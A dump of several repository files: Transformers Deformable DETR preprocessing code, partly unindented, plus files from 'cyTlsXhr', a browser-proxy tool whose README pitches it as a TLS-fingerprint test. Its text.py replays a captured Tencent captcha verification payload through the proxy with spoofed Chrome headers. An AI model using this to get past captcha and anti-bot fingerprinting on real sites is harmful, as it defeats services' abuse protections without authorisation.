# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.pad_and_create_pixel_mask
def pad_and_create_pixel_mask(
self,
pixel_values_list: List[ImageInput],
return_tensors: Optional[Union[str, TensorType]] = None,
data_format: Optional[ChannelDimension] = None,
) -> BatchFeature:
"""
Pads a batch of images with zeros to the size of largest height and width in the batch and returns their
corresponding pixel mask.
Args:
images (`List[np.ndarray]`):
Batch of images to pad.
return_tensors (`str` or `TensorType`, *optional*):
The type of tensors to return. Can be one of:
- Unset: Return a list of `np.ndarray`.
- `TensorType.TENSORFLOW` or `'tf'`: Return a batch of type `tf.Tensor`.
- `TensorType.PYTORCH` or `'pt'`: Return a batch of type `torch.Tensor`.
- `TensorType.NUMPY` or `'np'`: Return a batch of type `np.ndarray`.
- `TensorType.JAX` or `'jax'`: Return a batch of type `jax.numpy.ndarray`.
data_format (`str` or `ChannelDimension`, *optional*):
The channel dimension format of the image. If not provided, it will be the same as the input image.
"""
warnings.warn(
"This method is deprecated and will be removed in v4.27.0. Please use pad instead.", FutureWarning
)
# pad expects a list of np.ndarray, but the previous feature extractors expected torch tensors
images = [to_numpy_array(image) for image in pixel_values_list]
return self.pad(
images=images,
return_pixel_mask=True,
return_tensors=return_tensors,
data_format=data_format,
)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor._pad_image
def _pad_image(
self,
image: np.ndarray,
output_size: Tuple[int, int],
constant_values: Union[float, Iterable[float]] = 0,
data_format: Optional[ChannelDimension] = None,
) -> np.ndarray:
"""
Pad an image with zeros to the given size.
"""
input_height, input_width = get_image_size(image)
output_height, output_width = output_size
pad_bottom = output_height - input_height
pad_right = output_width - input_width
padding = ((0, pad_bottom), (0, pad_right))
padded_image = pad(
image, padding, mode=PaddingMode.CONSTANT, constant_values=constant_values, data_format=data_format
)
return padded_image
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.pad
def pad(
self,
images: List[np.ndarray],
constant_values: Union[float, Iterable[float]] = 0,
return_pixel_mask: bool = True,
return_tensors: Optional[Union[str, TensorType]] = None,
data_format: Optional[ChannelDimension] = None,
) -> np.ndarray:
"""
Pads a batch of images to the bottom and right of the image with zeros to the size of largest height and width
in the batch and optionally returns their corresponding pixel mask.
Args:
image (`np.ndarray`):
Image to pad.
constant_values (`float` or `Iterable[float]`, *optional*):
The value to use for the padding if `mode` is `"constant"`.
return_pixel_mask (`bool`, *optional*, defaults to `True`):
Whether to return a pixel mask.
input_channel_dimension (`ChannelDimension`, *optional*):
The channel dimension format of the image. If not provided, it will be inferred from the input image.
data_format (`str` or `ChannelDimension`, *optional*):
The channel dimension format of the image. If not provided, it will be the same as the input image.
"""
pad_size = get_max_height_width(images)
padded_images = [
self._pad_image(image, pad_size, constant_values=constant_values, data_format=data_format)
for image in images
]
data = {"pixel_values": padded_images}
if return_pixel_mask:
masks = [make_pixel_mask(image=image, output_size=pad_size) for image in images]
data["pixel_mask"] = masks
return BatchFeature(data=data, tensor_type=return_tensors)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.preprocess
    def preprocess(
        self,
        images: ImageInput,
        annotations: Optional[Union[AnnotationType, List[AnnotationType]]] = None,
        return_segmentation_masks: bool = None,
        masks_path: Optional[Union[str, pathlib.Path]] = None,
        do_resize: Optional[bool] = None,
        size: Optional[Dict[str, int]] = None,
        resample=None,  # PILImageResampling
        do_rescale: Optional[bool] = None,
        rescale_factor: Optional[Union[int, float]] = None,
        do_normalize: Optional[bool] = None,
        image_mean: Optional[Union[float, List[float]]] = None,
        image_std: Optional[Union[float, List[float]]] = None,
        do_pad: Optional[bool] = None,
        format: Optional[Union[str, AnnotionFormat]] = None,
        return_tensors: Optional[Union[TensorType, str]] = None,
        data_format: Union[str, ChannelDimension] = ChannelDimension.FIRST,
        **kwargs,
    ) -> BatchFeature:
        """
        Preprocess an image or a batch of images so that it can be used by the model.
        Args:
            images (`ImageInput`):
                Image or batch of images to preprocess.
            annotations (`AnnotationType` or `List[AnnotationType]`, *optional*):
                List of annotations associated with the image or batch of images. If annotionation is for object
                detection, the annotations should be a dictionary with the following keys:
                - "image_id" (`int`): The image id.
                - "annotations" (`List[Dict]`): List of annotations for an image. Each annotation should be a
                  dictionary. An image can have no annotations, in which case the list should be empty.
                If annotionation is for segmentation, the annotations should be a dictionary with the following keys:
                - "image_id" (`int`): The image id.
                - "segments_info" (`List[Dict]`): List of segments for an image. Each segment should be a dictionary.
                  An image can have no segments, in which case the list should be empty.
                - "file_name" (`str`): The file name of the image.
            return_segmentation_masks (`bool`, *optional*, defaults to self.return_segmentation_masks):
                Whether to return segmentation masks.
            masks_path (`str` or `pathlib.Path`, *optional*):
                Path to the directory containing the segmentation masks.
            do_resize (`bool`, *optional*, defaults to self.do_resize):
                Whether to resize the image.
            size (`Dict[str, int]`, *optional*, defaults to self.size):
                Size of the image after resizing.
            resample (`PILImageResampling`, *optional*, defaults to self.resample):
                Resampling filter to use when resizing the image.
            do_rescale (`bool`, *optional*, defaults to self.do_rescale):
                Whether to rescale the image.
            rescale_factor (`float`, *optional*, defaults to self.rescale_factor):
                Rescale factor to use when rescaling the image.
            do_normalize (`bool`, *optional*, defaults to self.do_normalize):
                Whether to normalize the image.
            image_mean (`float` or `List[float]`, *optional*, defaults to self.image_mean):
                Mean to use when normalizing the image.
            image_std (`float` or `List[float]`, *optional*, defaults to self.image_std):
                Standard deviation to use when normalizing the image.
            do_pad (`bool`, *optional*, defaults to self.do_pad):
                Whether to pad the image.
            format (`str` or `AnnotionFormat`, *optional*, defaults to self.format):
                Format of the annotations.
            return_tensors (`str` or `TensorType`, *optional*, defaults to self.return_tensors):
                Type of tensors to return. If `None`, will return the list of images.
            data_format (`str` or `ChannelDimension`, *optional*, defaults to self.data_format):
                The channel dimension format of the image. If not provided, it will be the same as the input image.
        """
        # --- Deprecated-kwarg handling -----------------------------------------------------------
        if "pad_and_return_pixel_mask" in kwargs:
            warnings.warn(
                "The `pad_and_return_pixel_mask` argument is deprecated and will be removed in a future version, "
                "use `do_pad` instead.",
                FutureWarning,
            )
            do_pad = kwargs.pop("pad_and_return_pixel_mask")
        max_size = None
        if "max_size" in kwargs:
            warnings.warn(
                "The `max_size` argument is deprecated and will be removed in a future version, use"
                " `size['longest_edge']` instead.",
                FutureWarning,
            )
            # NOTE(review): the deprecated value is assigned to `size` (typically an int) rather than
            # `max_size`; `get_size_dict` below converts it into a size dict. `max_size` itself stays
            # None here — confirm this matches the intended deprecation path.
            size = kwargs.pop("max_size")
        # --- Fill in every unspecified argument from the processor's configured defaults ---------
        do_resize = self.do_resize if do_resize is None else do_resize
        size = self.size if size is None else size
        size = get_size_dict(size=size, max_size=max_size, default_to_square=False)
        resample = self.resample if resample is None else resample
        do_rescale = self.do_rescale if do_rescale is None else do_rescale
        rescale_factor = self.rescale_factor if rescale_factor is None else rescale_factor
        do_normalize = self.do_normalize if do_normalize is None else do_normalize
        image_mean = self.image_mean if image_mean is None else image_mean
        image_std = self.image_std if image_std is None else image_std
        do_pad = self.do_pad if do_pad is None else do_pad
        format = self.format if format is None else format
        # --- Validate that each enabled step has the parameters it needs -------------------------
        if do_resize is not None and size is None:
            raise ValueError("Size and max_size must be specified if do_resize is True.")
        if do_rescale is not None and rescale_factor is None:
            raise ValueError("Rescale factor must be specified if do_rescale is True.")
        if do_normalize is not None and (image_mean is None or image_std is None):
            raise ValueError("Image mean and std must be specified if do_normalize is True.")
        images = make_list_of_images(images)
        # A single annotation dict is wrapped into a one-element batch to match `images`.
        if annotations is not None and isinstance(annotations, dict):
            annotations = [annotations]
        if annotations is not None and len(images) != len(annotations):
            raise ValueError(
                f"The number of images ({len(images)}) and annotations ({len(annotations)}) do not match."
            )
        if not valid_images(images):
            raise ValueError(
                "Invalid image type. Must be of type PIL.Image.Image, numpy.ndarray, "
                "torch.Tensor, tf.Tensor or jax.ndarray."
            )
        # --- Validate the annotation format and structure -----------------------------------------
        format = AnnotionFormat(format)
        if annotations is not None:
            if format == AnnotionFormat.COCO_DETECTION and not valid_coco_detection_annotations(annotations):
                raise ValueError(
                    "Invalid COCO detection annotations. Annotations must a dict (single image) of list of dicts"
                    "(batch of images) with the following keys: `image_id` and `annotations`, with the latter "
                    "being a list of annotations in the COCO format."
                )
            elif format == AnnotionFormat.COCO_PANOPTIC and not valid_coco_panoptic_annotations(annotations):
                raise ValueError(
                    "Invalid COCO panoptic annotations. Annotations must a dict (single image) of list of dicts "
                    "(batch of images) with the following keys: `image_id`, `file_name` and `segments_info`, with "
                    "the latter being a list of annotations in the COCO format."
                )
            elif format not in SUPPORTED_ANNOTATION_FORMATS:
                raise ValueError(
                    f"Unsupported annotation format: {format} must be one of {SUPPORTED_ANNOTATION_FORMATS}"
                )
        # Panoptic masks are loaded from disk, so the directory path must be usable as a path.
        if (
            masks_path is not None
            and format == AnnotionFormat.COCO_PANOPTIC
            and not isinstance(masks_path, (pathlib.Path, str))
        ):
            raise ValueError(
                "The path to the directory containing the mask PNG files should be provided as a"
                f" `pathlib.Path` or string object, but is {type(masks_path)} instead."
            )
        # All transformations expect numpy arrays
        images = [to_numpy_array(image) for image in images]
        # prepare (COCO annotations as a list of Dict -> DETR target as a single Dict per image)
        if annotations is not None:
            prepared_images = []
            prepared_annotations = []
            for image, target in zip(images, annotations):
                target = self.prepare_annotation(
                    image, target, format, return_segmentation_masks=return_segmentation_masks, masks_path=masks_path
                )
                prepared_images.append(image)
                prepared_annotations.append(target)
            images = prepared_images
            annotations = prepared_annotations
            del prepared_images, prepared_annotations
        # transformations
        if do_resize:
            if annotations is not None:
                # Images and their annotations must be resized in lockstep so boxes/masks stay aligned.
                resized_images, resized_annotations = [], []
                for image, target in zip(images, annotations):
                    orig_size = get_image_size(image)
                    resized_image = self.resize(image, size=size, max_size=max_size, resample=resample)
                    resized_annotation = self.resize_annotation(target, orig_size, get_image_size(resized_image))
                    resized_images.append(resized_image)
                    resized_annotations.append(resized_annotation)
                images = resized_images
                annotations = resized_annotations
                del resized_images, resized_annotations
            else:
                images = [self.resize(image, size=size, resample=resample) for image in images]
        if do_rescale:
            images = [self.rescale(image, rescale_factor) for image in images]
        if do_normalize:
            images = [self.normalize(image, image_mean, image_std) for image in images]
            # Box coordinates are normalized relative to the (resized) image dimensions.
            if annotations is not None:
                annotations = [
                    self.normalize_annotation(annotation, get_image_size(image))
                    for annotation, image in zip(annotations, images)
                ]
        if do_pad:
            # Pads images and returns their mask: {'pixel_values': ..., 'pixel_mask': ...}
            data = self.pad(images, return_pixel_mask=True, data_format=data_format)
        else:
            images = [to_channel_dimension_format(image, data_format) for image in images]
            data = {"pixel_values": images}
        encoded_inputs = BatchFeature(data=data, tensor_type=return_tensors)
        # Prepared annotations ride along as per-image `labels` BatchFeatures.
        if annotations is not None:
            encoded_inputs["labels"] = [
                BatchFeature(annotation, tensor_type=return_tensors) for annotation in annotations
            ]
        return encoded_inputs
# POSTPROCESSING METHODS - TODO: add support for other frameworks
def post_process(self, outputs, target_sizes):
"""
Converts the raw output of [`DeformableDetrForObjectDetection`] into final bounding boxes in (top_left_x,
top_left_y, bottom_right_x, bottom_right_y) format. Only supports PyTorch.
Args:
outputs ([`DeformableDetrObjectDetectionOutput`]):
Raw outputs of the model.
target_sizes (`torch.Tensor` of shape `(batch_size, 2)`):
Tensor containing the size (height, width) of each image of the batch. For evaluation, this must be the
original image size (before any data augmentation). For visualization, this should be the image size
after data augment, but before padding.
Returns:
`List[Dict]`: A list of dictionaries, each dictionary containing the scores, labels and boxes for an image
in the batch as predicted by the model.
"""
warnings.warn(
"`post_process` is deprecated and will be removed in v5 of Transformers, please use"
" `post_process_object_detection`.",
FutureWarning,
)
out_logits, out_bbox = outputs.logits, outputs.pred_boxes
if len(out_logits) != len(target_sizes):
raise ValueError("Make sure that you pass in as many target sizes as the batch dimension of the logits")
if target_sizes.shape[1] != 2:
raise ValueError("Each element of target_sizes must contain the size (h, w) of each image of the batch")
prob = out_logits.sigmoid()
topk_values, topk_indexes = torch.topk(prob.view(out_logits.shape[0], -1), 100, dim=1)
scores = topk_values
topk_boxes = torch_int_div(topk_indexes, out_logits.shape[2])
labels = topk_indexes % out_logits.shape[2]
boxes = center_to_corners_format(out_bbox)
boxes = torch.gather(boxes, 1, topk_boxes.unsqueeze(-1).repeat(1, 1, 4))
# and from relative [0, 1] to absolute [0, height] coordinates
img_h, img_w = target_sizes.unbind(1)
scale_fct = torch.stack([img_w, img_h, img_w, img_h], dim=1)
boxes = boxes * scale_fct[:, None, :]
results = [{"scores": s, "labels": l, "boxes": b} for s, l, b in zip(scores, labels, boxes)]
return results
def post_process_object_detection(
self, outputs, threshold: float = 0.5, target_sizes: Union[TensorType, List[Tuple]] = None
):
"""
Converts the raw output of [`DeformableDetrForObjectDetection`] into final bounding boxes in (top_left_x,
top_left_y, bottom_right_x, bottom_right_y) format. Only supports PyTorch.
Args:
outputs ([`DetrObjectDetectionOutput`]):
Raw outputs of the model.
threshold (`float`, *optional*):
Score threshold to keep object detection predictions.
target_sizes (`torch.Tensor` or `List[Tuple[int, int]]`, *optional*):
Tensor of shape `(batch_size, 2)` or list of tuples (`Tuple[int, int]`) containing the target size
(height, width) of each image in the batch. If left to None, predictions will not be resized.
Returns:
`List[Dict]`: A list of dictionaries, each dictionary containing the scores, labels and boxes for an image
in the batch as predicted by the model.
"""
out_logits, out_bbox = outputs.logits, outputs.pred_boxes
if target_sizes is not None:
if len(out_logits) != len(target_sizes):
raise ValueError(
"Make sure that you pass in as many target sizes as the batch dimension of the logits"
)
prob = out_logits.sigmoid()
topk_values, topk_indexes = torch.topk(prob.view(out_logits.shape[0], -1), 100, dim=1)
scores = topk_values
topk_boxes = torch_int_div(topk_indexes, out_logits.shape[2])
labels = topk_indexes % out_logits.shape[2]
boxes = center_to_corners_format(out_bbox)
boxes = torch.gather(boxes, 1, topk_boxes.unsqueeze(-1).repeat(1, 1, 4))
# and from relative [0, 1] to absolute [0, height] coordinates
if isinstance(target_sizes, List):
img_h = torch.Tensor([i[0] for i in target_sizes])
img_w = torch.Tensor([i[1] for i in target_sizes])
else:
img_h, img_w = target_sizes.unbind(1)
scale_fct = torch.stack([img_w, img_h, img_w, img_h], dim=1).to(boxes.device)
boxes = boxes * scale_fct[:, None, :]
results = []
for s, l, b in zip(scores, labels, boxes):
score = s[s > threshold]
label = l[s > threshold]
box = b[s > threshold]
results.append({"scores": score, "labels": label, "boxes": box})
return results
|
2833844911/cyTlsXhr | 7,541 | text.py | import base64
import json
import urllib.parse
import requests
def send_request_POST() -> requests.Response:
    """Send a captcha-verify POST through the local browser-proxy bridge.

    The payload is posted to the local proxy (127.0.0.1:15090), which replays it
    through a controlled browser so the TLS fingerprint matches real Chrome.

    Returns:
        requests.Response: the proxy's response; its JSON `data` field holds the
        base64-encoded upstream response body.
    """
    # Header order matters for fingerprinting — the proxy preserves this list order.
    headers = [
        ["cache-control", "no-cache"],
        ["sec-ch-ua-platform", "\"Windows\""],
        ["user-agent", 'dasdasdasdsad'],
        ["accept", "application/json"],
        ["sec-ch-ua", "\"Google Chrome\";v=\"126\", \"Not-A.Brand\";v=\"8\", \"Chromium\";v=\"126\""],
        ["content-type", "text/plain"],
        ["sec-ch-ua-mobile", "?0"],
        ["origin", "https://newassets.hcaptcha.com"],
        ["sec-fetch-site", "same-site"],
        ["sec-fetch-mode", "cors"],
        ["sec-fetch-dest", "empty"],
        ["sec-fetch-storage-access", "active"],
        ["referer", "https://newassets.hcaptcha.com/"],
        ["accept-encoding", "gzip, deflate, br, zstd"],
        ["accept-language", "zh,zh-CN;q=0.9,en;q=0.8"],
        ["priority", "u=1, i"]
    ]
    # Opaque captcha payload captured from a real session; forwarded verbatim.
    data = {
        'collect': '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',
        'tlg': '2432',
        'eks': 'jgRV5cVKt55oob94kMr5XPqR/Rg5jOLNtOeEE2A6xdAacoMwwRnEwyJyXTDiQz91OUoFpM8ih0FsWS5Nd3ondsQgFxGPJFXtVa3BpcFRI/aesijZKsOWJ75/6sweySWqL5Yg/BUtDQ1ESueHCga2KpSyojT4J08tH/YN9pTrtavDH/TX2WoJK/bh/5mzKenn23dTDCnSbMcuvQjVCN6H9erDHd/sF+FPTbcjLg/tkY4=',
        'sess': 's0vP93cOMLB99IuLJ0Iro1miP8F5IOcVwgAf-IRRrSnEW_-F3BrSfUzKxx5ECb5wp0_Mn_wPKbVivaubtZe8WzJeEU_OCJQufuBURHxZ-EZIfNvL7Izln6ns05qtsCiYxBCtmewxhw-gH-HqBvjeDQOiyKb8ktLUgroTPXTdrNaWAkYR8i--eYy0VMWKAj_CSETd096s2exnZzw8JS2YBZh8DMsW2rvcSwAVChai_Cm7A99rJqxTCzrfyM1971A3phyf83d8xSzhjrzC55PAWmClhukFc-XXNfILTswSgZLkBFH3TWgzfWc5Ec-Z47Ec3xW46PK7psUQ5--htlb9m69EmGPybSXSesmbwjE_mhyDXnepCSUN52O36czOtvlDRnTiB4wwR15ITSQ4Owf6xROeyNBVLoVL0F9-YwS58x0mmkIgeZ9ZSZ8ITtIaXO-WABy_TzjQJsBvYV-FGkImQBGcKmc2NZ2GQqt53eRP1e3-c0YG9KkMiNhpFP2diUjVUepKhIpsYXLI_MIPbJmPwY2tJT7fkFwt1-M11biQhpMDjLOYqulD6-uflxyKL_ydbXK38RoMvWYN546HhZ4lAPhrs3dmb6uKRwkT6JjskEFRvNEH1O5hImCaHj_NMBLcmi5UUJZbXBhsq5YK7MnM3fUfMycSTTRxzSY_P1LMqB-yRcGJUaDC57PyGvMdaKoiRkQEhGg3w2teeP5aiFG0XRNEuNHtLLim-6dCDkZ1HJAFMbT6fRlrmlQPcvSjIVRAmR5a-AKYZyaiGFiGLDDlfpcPax0gaaJJCk_9OFq24HEKnxkklyf4K9t3CmcPBU2Ve4',
        'ans': '[{"elem_id":1,"type":"DynAnswerType_UC","data":"5,6"}]',
        'pow_answer': 'cafdee0e1e3b5ac0#10298',
        'pow_calc_time': '27',
    }
    data = json.dumps(data)
    return requests.post(
        'http://127.0.0.1:15090/proxy',
        json={
            'url': 'https://t.captcha.qq.com/cap_union_new_verify',
            "headers": headers,
            'method': 'POST',
            # Set 'bodyType': 'b64' to send binary data; 'body' is then the base64-encoded bytes.
            'bodyType': '',
            'client_id': 'be22165f-e3c3-4570-94f1-017ea57ae459',
            "token": "d7bed4fd-9852-430f-9d2a-695d2641bf80",
            "body": data,
            # A proxy is required. (The original `//必须传代理` trailing comment was not valid
            # Python comment syntax and broke the file; `#` is the correct form.)
            'proxy': 'http://xxx.xxx.xxx.xxx:xxxx'
        },
    )
def send_request_GET() -> requests.Response:
    """Send a plain GET through the local browser-proxy bridge.

    Returns:
        requests.Response: the proxy's response; its JSON `data` field holds the
        base64-encoded upstream response body.
    """
    # Header order matters for fingerprinting — the proxy preserves this list order.
    headers = [
        ["cache-control", "no-cache"],
        ["sec-ch-ua-platform", "\"Windows\""],
        ["user-agent", 'ddddd'],
        ["accept", "application/json"],
        ["sec-ch-ua", "\"Google Chrome\";v=\"126\", \"Not-A.Brand\";v=\"8\", \"Chromium\";v=\"126\""],
        ["content-type", "text/plain"],
        ["sec-ch-ua-mobile", "?0"],
        ["origin", "https://newassets.hcaptcha.com"],
        ["sec-fetch-site", "same-site"],
        ["sec-fetch-mode", "cors"],
        ["sec-fetch-dest", "empty"],
        ["sec-fetch-storage-access", "active"],
        ["referer", "https://newassets.hcaptcha.com/"],
        ["accept-encoding", "gzip, deflate, br, zstd"],
        ["accept-language", "zh,zh-CN;q=0.9,en;q=0.8"],
        ["priority", "u=1, i"]
    ]
    return requests.post(
        'http://127.0.0.1:15090/proxy',
        json={
            'url': 'https://www.baidu.com',
            "headers": headers,
            'method': 'GET',
            'bodyType': '',
            'client_id': 'be22165f-e3c3-4570-94f1-017ea57ae459',
            # A proxy is required. (The original `//必须传代理` trailing comment was a
            # SyntaxError in Python; `#` is the correct comment form.)
            'proxy': 'http://xxx.xxx.xxx.xxx:xxxx',
            "token": "d7bed4fd-9852-430f-9d2a-695d2641bf80",
        },
    )
def main():
    """Run the POST demo then the GET demo, printing each decoded response."""
    try:
        for request_fn in (send_request_POST, send_request_GET):
            response = request_fn()
            print(f"Status Code: {response.status_code}")
            # The proxy returns the upstream body base64-encoded under 'data'.
            decoded = base64.b64decode(response.json()['data']).decode('utf-8')
            print(f"Response: {decoded}")
            print(f"Response: {response.headers}")
    except Exception as e:
        print(f"发生错误: {e}")
# Run the demo requests only when executed as a script (not on import).
if __name__ == "__main__":
    main()
|
27182812/ChatGLM-LLaMA-chinese-insturct | 1,244 | src/transformers/models/deformable_detr/feature_extraction_deformable_detr.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Feature extractor class for Deformable DETR."""
import warnings
from ...utils import logging
from .image_processing_deformable_detr import DeformableDetrImageProcessor
logger = logging.get_logger(__name__)
class DeformableDetrFeatureExtractor(DeformableDetrImageProcessor):
    """Deprecated alias kept for backward compatibility.

    Behaves identically to [`DeformableDetrImageProcessor`]; instantiating it only
    emits a `FutureWarning` advising callers to migrate before Transformers v5.
    """

    def __init__(self, *args, **kwargs) -> None:
        # Warn on every instantiation, then defer entirely to the image processor.
        warnings.warn(
            "The class DeformableDetrFeatureExtractor is deprecated and will be removed in version 5 of Transformers."
            " Please use DeformableDetrImageProcessor instead.",
            FutureWarning,
        )
        super().__init__(*args, **kwargs)
|
2833844911/cyTlsXhr | 655 | README.md | ## cytlsxhr
- 视频教程: https://www.bilibili.com/video/BV1pKVaz1EsX
### 介绍
- 用于测试网站是否检测 TLS 指纹;该项目的 TLS 已经过各种测试,应为完美的 134 版本 TLS
- 请求需要携带代理,需要注意代理是否可以在国内使用
### 功能
- 使用浏览器转发让tls完美
- header可以自定义顺序
- 返回和请求不会有任何限制
- 保持统一会话
- 可以切换代理支持账号密码
### 准备环境
- 1.双击Chrome-bin/mini_installer.exe
- 2.把新安装的chrome.exe的路径复制到chrome.txt
### 启动
- 1.双击 proxy.exe
- 2.双击 server-debug.exe
### 获取token和client
- 1.浏览器打开http://127.0.0.1:15090/getinfo 登入admin/admin
- 2.复制浏览器状态中浏览器列表 里面的ID 例子:be22165f-e3c3-4570-94f1-017ea57ae459
- 3.粘贴到 text.py 中的client_id key的value里面
- 4.复制浏览器创建令牌中的创建令牌 里面的token 例子:d7bed4fd-9852-430f-9d2a-695d2641bf80
- 5.粘贴到 text.py 中的token key的value里面
- 6.运行 text.py
|
2833844911/cyTlsXhr | 20,810 | client.html | <!DOCTYPE html>
<html lang="zh">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>浏览器代理客户端</title>
<style>
body {
font-family: Arial, sans-serif;
max-width: 400px;
margin: 0 auto;
padding: 20px;
text-align: center;
}
#logs {
border: 1px solid #ccc;
padding: 10px;
height: 80px;
overflow-y: auto;
margin-bottom: 20px;
background-color: #f9f9f9;
text-align: left;
font-size: 12px;
}
.success { color: green; }
.error { color: red; }
.info { color: blue; }
.status {
font-weight: bold;
font-size: 24px;
margin: 20px 0;
padding: 10px;
border-radius: 5px;
}
.connected {
color: white;
background-color: green;
}
.disconnected {
color: white;
background-color: red;
}
.connecting {
color: white;
background-color: orange;
}
.hidden {
display: none;
}
</style>
</head>
<body>
<h1>浏览器代理</h1>
<div class="status disconnected" id="status">未连接</div>
<div id="logs" class="hidden"></div>
<script>
let socket = null;
let clientId = null;
let reconnectTimeout = null;
let reconnectAttempts = 0;
const maxReconnectAttempts = 100; // 最大重连次数
let proxyAddress = "未知";
let proxyId = "未知"; // 添加proxyId变量
const statusDiv = document.getElementById('status');
const logsDiv = document.getElementById('logs');
// 获取URL参数
function getUrlParam(name) {
const urlParams = new URLSearchParams(window.location.search);
return urlParams.get(name);
}
// 尝试从URL获取代理地址参数和代理ID
function detectProxyAddress() {
// 从URL参数中获取代理地址
const proxyParam = getUrlParam('proxy');
if (proxyParam) {
proxyAddress = proxyParam;
log(`检测到代理地址参数: ${proxyAddress}`);
}
// 获取代理ID参数
const proxyIdParam = getUrlParam('proxy_id');
if (proxyIdParam) {
proxyId = proxyIdParam;
log(`检测到代理ID参数: ${proxyId}`);
}
// 如果没有直接参数,尝试通过其他方式检测
if (!proxyParam) {
try {
// 使用简单的方法: 获取URL中的proxy参数
const queryString = window.location.search;
const urlParams = new URLSearchParams(queryString);
const proxy = urlParams.get('proxy');
if (proxy) {
proxyAddress = proxy;
log(`检测到代理地址: ${proxyAddress}`);
}
} catch (error) {
log(`检测代理地址失败: ${error.message}`, 'error');
}
}
}
// 记录日志
function log(message, type = 'info') {
const logEntry = document.createElement('div');
logEntry.className = type;
logEntry.textContent = `[${new Date().toLocaleTimeString()}] ${message}`;
logsDiv.appendChild(logEntry);
